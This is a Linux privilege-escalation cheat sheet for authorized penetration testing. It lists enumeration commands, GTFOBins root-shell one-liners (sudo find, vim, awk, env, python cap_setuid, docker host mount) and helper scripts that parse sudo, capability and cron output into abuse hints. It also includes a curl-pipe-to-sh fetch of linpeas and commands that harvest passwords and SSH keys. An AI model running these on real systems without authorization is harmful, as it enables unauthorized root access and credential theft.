CyberCheatsheets

Linux Privilege Escalation Cheat Sheet

Enumeration and escalation paths to go from a low-privilege shell to root on Linux during authorized engagements.

Exploitation & Payloads · Tags: enumeration, linux, post-exploitation, privesc, suid · Updated 2026-06-17

Overview

Linux privilege escalation is about finding a misconfiguration, weak permission, or vulnerable binary that lets a low-privileged user run code as a higher-privileged one (usually root). The workflow is always the same: enumerate thoroughly, identify the weakest path, then exploit it. Start with automated enumeration (linpeas) but always confirm findings manually—GTFOBins is your reference for turning a binary into a shell.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

First: situational awareness

Current user, groups (look for sudo, docker, lxd, disk, adm)

id

Kernel version — pivot to kernel-exploit search if old

uname -a

Distro and version

cat /etc/os-release

Commands you can run through sudo; a NOPASSWD entry, or any sudo-able binary that GTFOBins lists, is the #1 quick win

sudo -l

Host and network context

hostname; ip a; cat /etc/hosts
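The five commands above are what you type in the first minute; the script below is an added example (not from the cheat sheet) that runs them and then flags group memberships that commonly turn into root. The group list is the one the sheet names plus wheel, admin, lxc, shadow and video (an assumption of the example; adjust per distro), and the `id` line used to exercise `flag_groups` is constructed, including an SELinux `context=` suffix that a naive parser would choke on.

```sh
# Added example: first-minute triage with dangerous-group flagging.
# Group list = the sheet's sudo/docker/lxd/disk/adm plus wheel/admin/lxc/shadow/video.
DANGEROUS_GROUPS="sudo wheel admin docker lxd lxc disk adm shadow video"

# flag_groups ID_LINE
# Takes one line of `id` output and prints every dangerous group in it,
# one per line, in the order `id` listed them. Tolerates a trailing
# SELinux "context=..." field.
flag_groups() {
    id_line=$1
    # "groups=1000(bob),4(adm),999(docker) context=..." -> "bob adm docker"
    names=$(printf '%s\n' "$id_line" \
        | sed -n 's/.*groups=\([^ ]*\).*/\1/p' \
        | tr ',' '\n' \
        | sed -n 's/^[0-9]*(\(.*\))$/\1/p')
    for g in $names; do
        for d in $DANGEROUS_GROUPS; do
            if [ "$g" = "$d" ]; then printf '%s\n' "$g"; fi
        done
    done
    return 0
}

# triage: the sheet's situational-awareness commands, then the group flags.
# `sudo -n` never prompts, so this is safe on a shell with no TTY.
triage() {
    printf '== id ==\n';      id
    printf '== kernel ==\n';  uname -a
    printf '== distro ==\n';  head -n 2 /etc/os-release 2>/dev/null || true
    printf '== host/net ==\n'
    hostname 2>/dev/null || uname -n
    ip a 2>/dev/null || ifconfig 2>/dev/null || true
    printf '== dangerous groups ==\n'
    flag_groups "$(id)"
    printf '== sudo -l (non-interactive) ==\n'
    sudo -n -l 2>&1 | head -n 20
}

triage
```

Anything `flag_groups` prints maps directly to a section further down this sheet (sudo abuse, docker/adm group abuse), so it is a good first branch point.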

Automated enumeration

linpeas one-shot: pipe straight to sh when you cannot (or would rather not) write to disk; needs outbound HTTPS from the target

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Full (-a) scan, save output for review

wget -q https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -O /tmp/lp.sh && bash /tmp/lp.sh -a | tee /tmp/lp.out

LinEnum thorough mode (alternative)

./LinEnum.sh -t

SUID / SGID and capabilities

All SUID binaries — check each against GTFOBins

find / -perm -4000 -type f 2>/dev/null

All SGID binaries

find / -perm -2000 -type f 2>/dev/null

File capabilities — cap_setuid on python/perl = instant root

getcap -r / 2>/dev/null

Abuse cap_setuid+ep on python3

/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Only works if python3 has the setuid capability (confirm with getcap).
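`getcap -r /` output has to be read, not just run, and its format changed between libcap releases (older: `/path = cap_setuid+ep`; newer: `/path cap_setuid=ep`). The script below is an added example, not part of the cheat sheet: it parses both forms, keeps only capabilities that commonly give a direct escalation on their own (the list is the example's own assumption), and prints the sheet's python/perl setuid one-liner for the cases it knows. The sample `getcap` lines are constructed.

```sh
# Added example: triage `getcap -r /` output and emit abuse hints.
# Caps that usually mean a direct path to root or to root-only files (assumed list).
DANGEROUS_CAPS="cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner"

# The sheet's cap_setuid one-liners (GTFOBins "capabilities" entries).
PY_SETUID='import os; os.setuid(0); os.system("/bin/sh")'
PL_SETUID='use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

# cap_flags: read getcap output on stdin, print "path cap" per dangerous cap.
# Handles "/p = cap_a,cap_b+ep" (libcap < 2.41) and "/p cap_a,cap_b=ep" (newer).
# Paths containing spaces are not handled (rare for binaries with caps).
cap_flags() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        path=${line%% *}
        caps=${line#"$path"}
        caps=${caps#" = "}           # old style separator
        caps=${caps#" "}             # new style separator
        # drop the +ep / =ep flag suffixes, split the comma list
        caps=$(printf '%s\n' "$caps" | sed 's/[=+][a-z]*//g; s/,/ /g')
        for c in $caps; do
            for d in $DANGEROUS_CAPS; do
                if [ "$c" = "$d" ]; then printf '%s %s\n' "$path" "$c"; fi
            done
        done
    done
    return 0
}

# cap_hint PATH CAP: canned abuse command for the interpreters the sheet covers,
# otherwise a pointer to GTFOBins.
cap_hint() {
    case "$2:${1##*/}" in
        cap_setuid:python*) printf "%s -c '%s'\n" "$1" "$PY_SETUID" ;;
        cap_setuid:perl*)   printf "%s -e '%s'\n" "$1" "$PL_SETUID" ;;
        *) printf 'no canned hint; check GTFOBins for %s with %s\n' "${1##*/}" "$2" ;;
    esac
}

# Constructed sample covering both output styles.
SAMPLE_GETCAP='/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/local/bin/backup cap_dac_read_search=ep
/usr/bin/gnome-keyring-daemon cap_ipc_lock=ep'

printf '%s\n' "$SAMPLE_GETCAP" | cap_flags | while read -r p c; do cap_hint "$p" "$c"; done

# On a real target:
if command -v getcap >/dev/null 2>&1; then
    getcap -r / 2>/dev/null | cap_flags | while read -r p c; do cap_hint "$p" "$c"; done
fi
```

cap_dac_read_search does not give a shell by itself, but it lets the binary read /etc/shadow or root's SSH keys, which is why it is flagged alongside cap_setuid.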

sudo abuse (GTFOBins)

Root shell via sudo find

sudo find . -exec /bin/sh \; -quit

Root shell via sudo vim

sudo vim -c ':!/bin/sh'

Root shell via sudo awk

sudo awk 'BEGIN {system("/bin/sh")}'

Root shell if sudo env is allowed

sudo env /bin/sh
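Each of the four commands above assumes you already know which binaries `sudo -l` allows. The script below is an added example (not from the cheat sheet) that parses `sudo -l` output, separates NOPASSWD entries from ones that still need your password, and cross-references the program name against a small list of GTFOBins-style binaries. That list is a constructed subset for illustration, not GTFOBins itself, and the `sudo -l` transcript it runs on is constructed too.

```sh
# Added example: turn `sudo -l` output into a ranked list of candidates.
# Constructed subset of binaries GTFOBins documents for sudo; the real
# reference is https://gtfobins.github.io/.
GTFO_SUDO="find vim vi awk env python python3 perl less more nano tar zip nmap systemctl"

# sudo_candidates: read `sudo -l` output on stdin; for every
# "(runas) [NOPASSWD:] /path [args], /path2 ..." rule print
# "<basename> <NOPASSWD|PASSWD> <path>" for entries in GTFO_SUDO,
# and a dedicated line when the rule is ALL.
sudo_candidates() {
    set -f                                  # rules may contain globs like /usr/bin/*
    while IFS= read -r line; do
        case "$line" in
            *"("*")"*) ;;                   # rule lines carry a "(runas)" spec
            *) continue ;;
        esac
        rule=${line#*")"}
        tag=PASSWD
        case "$rule" in *NOPASSWD:*) tag=NOPASSWD ;; esac
        # strip leading tags such as "NOPASSWD: SETENV:"
        cmds=$(printf '%s\n' "$rule" | sed 's/^[[:space:]]*\([A-Z]*:[[:space:]]*\)*//')
        old_ifs=$IFS; IFS=','
        for cmd in $cmds; do
            IFS=$old_ifs
            set -- $cmd                     # $1 = program, rest = fixed arguments
            path=$1
            if [ -z "$path" ]; then continue; fi
            case "$path" in \!*) continue ;; esac   # negated entry, not runnable
            if [ "$path" = ALL ]; then
                printf 'ALL %s (any command)\n' "$tag"
                continue
            fi
            name=${path##*/}
            for k in $GTFO_SUDO; do
                if [ "$name" = "$k" ]; then printf '%s %s %s\n' "$name" "$tag" "$path"; fi
            done
        done
        IFS=$old_ifs
    done
    set +f
    return 0
}

# Constructed `sudo -l` transcript.
SAMPLE_SUDO_L='Matching Defaults entries for bob on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User bob may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/find, /usr/bin/vim
    (root) /usr/bin/systemctl status nginx'

printf '%s\n' "$SAMPLE_SUDO_L" | sudo_candidates

# On a real target (-n: never prompt, so it cannot hang a raw shell):
if command -v sudo >/dev/null 2>&1; then
    sudo -n -l 2>/dev/null | sudo_candidates
fi
```

An entry with fixed arguments (the `systemctl status nginx` line) still shows up because sudo compares the whole argument list; whether it is abusable depends on the binary, so check GTFOBins for the exact form before assuming it works.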

Cron jobs

System cron — look for scripts you can write to

cat /etc/crontab; ls -la /etc/cron.*

Cron sets its own PATH inside the crontab; a writable directory in it, combined with a job that calls a command by bare name, lets you shadow that command

grep -rnw '/etc' -e 'PATH' 2>/dev/null | grep -i cron

Writable files — cross-reference with any cron-run script

find / -writable -type f 2>/dev/null | grep -vE '^/proc|^/sys'
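The three commands above produce raw lists that you still have to correlate by hand. The script below is an added example, not part of the cheat sheet, that does the correlation for system-format crontabs: it parses each job line, reports commands referenced by bare name (resolved through cron's PATH), commands whose file or parent directory you can write, and writable directories in the crontab's own PATH= line. The crontab lines it is exercised with are constructed.

```sh
# Added example: correlate crontab entries with what the current user can write.
# Reads crontab(5) system format (m h dom mon dow user command), as used by
# /etc/crontab and /etc/cron.d/*.

# cron_check: print one line per job you could tamper with:
#   RELATIVE     command has no slash, so cron resolves it via its PATH
#   WRITABLE     the command file itself is writable by the current user
#   WRITABLE-DIR the file is missing or read-only, but its directory is writable
cron_check() {
    set -f                                       # keep "*/5 * * * *" from globbing
    while IFS= read -r line; do
        case "$line" in ''|\#*|[A-Za-z_]*=*) continue ;; esac   # blank, comment, VAR=value
        set -- $line
        case "$1" in
            @*) shift 1 ;;                       # @reboot / @daily: one schedule field
            *)  [ $# -ge 6 ] || continue; shift 5 ;;
        esac
        user=$1; shift
        cmd=$1
        [ -n "$cmd" ] || continue
        case "$cmd" in
            */*)
                dir=$(dirname "$cmd")
                if [ -w "$cmd" ]; then
                    printf 'WRITABLE %s %s\n' "$user" "$cmd"
                elif [ -w "$dir" ]; then
                    printf 'WRITABLE-DIR %s %s\n' "$user" "$cmd"
                fi ;;
            *)  printf 'RELATIVE %s %s\n' "$user" "$cmd" ;;
        esac
    done
    set +f
    return 0
}

# cron_path_check: print each directory of the crontab's PATH= line that is
# writable, i.e. where a dropped binary would shadow a RELATIVE command.
cron_path_check() {
    path_line=$(sed -n 's/^[[:space:]]*PATH=//p' | head -n 1 | tr -d '"')
    old_ifs=$IFS; IFS=:
    for d in $path_line; do
        if [ -n "$d" ] && [ -w "$d" ]; then printf 'WRITABLE-PATH-DIR %s\n' "$d"; fi
    done
    IFS=$old_ifs
    return 0
}

# On a real target:
for f in /etc/crontab /etc/cron.d/*; do
    if [ -r "$f" ]; then
        printf '== %s ==\n' "$f"
        cron_check < "$f"
        cron_path_check < "$f"
    fi
done
```

A RELATIVE hit is only useful together with a WRITABLE-PATH-DIR that comes earlier in PATH than the real binary, and a WRITABLE-DIR hit only if the job's user is root (or another account you want); the two checks are meant to be read side by side.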

Quick one-liners

Spawn a fully interactive TTY (do this first on a raw shell)

python3 -c 'import pty;pty.spawn("/bin/bash")'

Find world-writable directories

find / -writable -type d 2>/dev/null

Look for passwords in config/history files

grep -riE 'password|passwd|secret|api[_-]?key' /home /var/www /etc 2>/dev/null | head

List internal listening services (pivot targets)

ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null

Find SSH private keys (RSA, Ed25519, ECDSA, PEM); try each against other hosts and users

find / -type f \( -name 'id_rsa*' -o -name 'id_ed25519*' -o -name 'id_ecdsa*' -o -name '*.pem' \) 2>/dev/null

Dangerous group memberships

Member of docker group = root: mount the host filesystem into a container and chroot into it (needs an image already present locally or pullable)

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

adm group can read logs (creds, tokens)

find / -group adm -readable 2>/dev/null

Tips

  • Always run sudo -l first: a NOPASSWD entry, or any sudo-able binary listed on GTFOBins, is the fastest and most common path.
  • Every interesting SUID binary should be checked at GTFOBins before anything else.
  • Stabilize your shell with a PTY before running interactive tools (vim, ftp, sudo prompts).
  • Kernel exploits are a last resort — they're noisy and can crash the box.
